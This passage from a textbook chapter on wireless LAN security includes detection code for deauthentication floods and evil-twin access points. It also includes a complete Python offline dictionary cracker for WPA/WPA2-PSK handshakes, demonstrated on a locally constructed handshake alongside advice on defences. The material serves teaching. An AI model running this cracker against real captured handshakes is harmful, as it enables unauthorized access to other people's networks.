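            return body[pos + 2:pos + 2 + length].decode(errors="replace")
        pos += 2 + length
    return None


def mac_filter_allows(frame, allowlist):
    # An allowlist can only look at the plaintext transmitter address (addr2)
    return frame["addr2"] in allowlist


def deauth_flood_sources(frames, threshold=20):
    counts = Counter(f["addr2"] for f in frames if f["type"] == MGMT and f["subtype"] == DEAUTH)
    return {src for src, n in counts.items() if n >= threshold}


def evil_twin_bssids(frames, corp_ssid, known_bssids):
    return {f["addr3"] for f in frames
            if f["type"] == MGMT and f["subtype"] == BEACON
            and beacon_ssid(f["body"]) == corp_ssid and f["addr3"] not in known_bssids}


# Constructed capture with assumed addresses (not real traffic)
AP, ROGUE = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"
CLIENT, BCAST = "00:aa:bb:cc:dd:01", "ff:ff:ff:ff:ff:ff"
ALLOWLIST = {CLIENT}


def sample_capture():
    raw = [
        build_frame(MGMT, BEACON, BCAST, AP, AP, beacon_body("CorpNet")),        # legitimate AP
        build_frame(MGMT, BEACON, BCAST, ROGUE, ROGUE, beacon_body("CorpNet")),  # soft-AP evil twin
        build_frame(DATA, 0, AP, CLIENT, AP, b"\x00" * 16, protected=True),      # real client
        build_frame(DATA, 0, AP, CLIENT, AP, b"\x00" * 16, protected=True),      # attacker, cloned MAC
    ]
    raw += [build_frame(MGMT, DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))] * 25  # spoofed deauths
    return [parse_frame(r) for r in raw]


def run_checks():
    frames = sample_capture()
    return {
        "cloned_mac_passes_filter": mac_filter_allows(frames[3], ALLOWLIST),
        "deauth_flood": deauth_flood_sources(frames),
        "evil_twins": evil_twin_bssids(frames, "CorpNet", {AP}),
    }


if __name__ == "__main__":
    print(run_checks())
```

The attacker's data frame and the real client's frame are byte-for-byte identical at the header level, which is why an allowlist cannot tell them apart; wireless intrusion detection systems run essentially the beacon and deauthentication checks above, at scale, against live captures. Management frame protection (IEEE 802.11w), where both the AP and clients support it, adds integrity to deauthentication and disassociation frames but still leaves the addresses in the clear.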


Security Standardization in WLAN 

The issue of security in 802.11 has drawn considerable attention from vendors, users, and developers. The first security specification introduced for wireless LANs is known as Wired Equivalent Privacy (WEP), which was intended to provide the same level of privacy as a wired LAN. For more details, please refer to Refs. [6,13-15].

Wi-Fi depends on cryptographic methods to provide security, using the WEP and Wi-Fi Protected Access (WPA) security mechanisms.

WEP was the first cryptographic protocol developed for Wi-Fi to provide privacy and authentication. WEP, however, turned out not to be secure. To rectify the security issues with WEP, the Wi-Fi Alliance pushed a new cryptographic protocol, WPA. Since then, the common practice of securing a WPA-enabled network with a pre-shared passphrase has been found to be vulnerable to an offline dictionary attack: an attacker who records the four-way handshake between a client and the access point can test candidate passphrases against it offline, without any further interaction with the network. Apart from the dictionary attack, WPA itself is thought to be secure, even though it was a quick fix to the problems in WEP. WPA is a subset of the Robust Security Network (RSN) introduced in an early draft of the security standard developed by IEEE 802.11i.
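The offline dictionary attack just described follows directly from how the pre-shared key is derived. The following Python is an added example, not code from the original chapter: it implements the 802.11i key derivation (PBKDF2-HMAC-SHA1 over the passphrase and SSID to obtain the PMK, the PRF-512 expansion to the PTK, and the EAPOL-Key MIC computed with the first 128 bits of the PTK) and then uses it as an attacker would, trying each word of a dictionary against a captured handshake. Because there is no network to capture from here, the "captured" handshake is constructed locally from a known passphrase; the MAC addresses, the SSID "CorpNet", the toy wordlist and the placeholder EAPOL-Key body are assumptions of the example, not values from the page.

```python
"""Offline dictionary attack on a WPA/WPA2-PSK four-way handshake. The handshake
is constructed locally with a known passphrase so the example runs offline; in
practice the same five values (SSID, the two MACs, ANonce, SNonce) plus message 2
of the handshake and its MIC are read from a packet capture."""
import hashlib
import hmac
import os


def pmk_from_passphrase(passphrase, ssid):
    # IEEE 802.11i: PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, keep 64 bytes
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    # WPA2/CCMP: MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed), truncated to 128 bits
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(handshake, wordlist):
    """For each candidate: PMK -> PTK -> KCK (first 16 bytes of PTK) -> MIC; compare with the
    captured MIC. Everything needed is in the capture, so the loop never touches the network."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def make_handshake(passphrase, ssid="CorpNet"):
    """Construct what a sniffer would record from message 2 of the four-way handshake
    (assumed MACs; random nonces; a placeholder EAPOL-Key body stands in for the real frame)."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("00aabbccdd01")
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a" + snonce + b"\x00" * 16      # MIC field zeroed
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


WORDLIST = ["letmein", "wireless", "password123", "CorpNet2012"]   # constructed toy dictionary


def demo():
    weak = crack_psk(make_handshake("password123"), WORDLIST)
    strong = crack_psk(make_handshake("d7Q!v2#kLp9zXwE4tR"), WORDLIST)
    return {"weak": weak, "strong": strong}


if __name__ == "__main__":
    print(demo())   # {'weak': 'password123', 'strong': None}
```

This is the loop that tools such as aircrack-ng run against a real capture. The 4096 PBKDF2 iterations, and the fact that the SSID is the salt, are what make the attack slow (on the order of thousands of candidates per second per CPU core, with precomputation only helping against networks that share an SSID), so the passphrase, not WPA's ciphers, decides the outcome: a dictionary word falls, a long random passphrase does not. The defenses are a long random passphrase or, better, per-user 802.1X/EAP authentication, which removes the shared passphrase altogether.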

Security protocols for WLANs are listed in the following. Further discussion of this topic can be found in Chapters 30, 31, 33, and others, and, therefore, will not be repeated here.

• Wired Equivalent Privacy (WEP)

• Wi-Fi Protected Access version 1 (WPA)

• Wi-Fi Protected Access version 2 (WPA2)

• Temporal Key Integrity Protocol (TKIP)

• Extensible Authentication Protocol (EAP)

• Lightweight Extensible Authentication Protocol (LEAP)

• Protected Extensible Authentication Protocol (PEAP)

RF Shielding 

It is practical in some cases to apply specialized wall paint and window film to a room or building to significantly attenuate wireless signals, which keeps them from propagating outside the facility. This can significantly improve wireless security because it becomes difficult for attackers to receive the signals beyond the controlled area of an enterprise, for example from a parking lot. Shielding attenuates rather than eliminates the signal, and an attacker with a high-gain directional antenna can still pick up a much weaker signal than a laptop adapter would, so it complements encryption and authentication instead of replacing them.

References 

1. J. Kurose and K. Ross, Computer Networking: A Top-Down Approach, 5th edn., Addison-Wesley, Reading, MA, 2010.

2. G. S. Hura and M. Singhal, Data and Computer Communications: Networking and Internetworking, CRC Press, Boca Raton, FL, 2001.

3. http://www.microsoft.com/en-us/security_essentials/default.aspx (January 12, 2010).

4. B. Forouzan, TCP/IP Protocol Suite, 3rd edn., McGraw-Hill, New York, 2006.



5. W. Stallings, Data and Computer Communications, 8th edn., Pearson Prentice Hall, Upper Saddle River, NJ, 2007.

6. http://www.gfi.com/endpointsecurity/esecpapers.htm/ (May 20, 2010).

7. M. Dunn and I. Wigert, The Critical Information Infrastructure Protection (CIIP) Handbook 2004, A. Wenger and J. Metzger (eds.), Swiss Federal Institute of Technology, http://www.isn.ethz.ch/crn/, 2006 (March 22, 2010).

8. L. Applegate, E-business models, in Information Technology and the Future of the Enterprise, G. Dickson and G. DeSanctis (eds.), Prentice Hall, Upper Saddle River, NJ, pp. 49-101, 2001.

9. National Institute of Standards and Technology, Technology Administration, U.S. Department of Commerce, An Introduction to Computer Security: The NIST Handbook, Special Publication 800-12, 2006, http://csrc.nist.gov/groups/SMA/fisma/index.html (December 22, 2009).

10. A. Wong and A. Yeung, Network Infrastructure Security, Springer Verlag, Berlin, Germany, 2009.

11. T. Zimmermann, Personal area networks: Near-field intrabody communication, MS thesis in Media Arts and Sciences, MIT Media Lab, 1995 (March 3, 2010).

12. G. S. Hura, Guest editor of special issue on Internet: State-of-the-art, Computer Communications, 20(16), 1391-1540, 1998.

13. http://www.fsisac.com/files/FS-ISAC_Overview_2007_04_10.pdf (February 2, 2010).

14. http://www.ncs.gov/ncc/gov_ind.html (May 21, 2010).

15. http://www.esisac.com/publicdocs/Guides/SecGuide_PhysResponse_BOTapprvd1Nov2005.pdf (January 29, 2010).

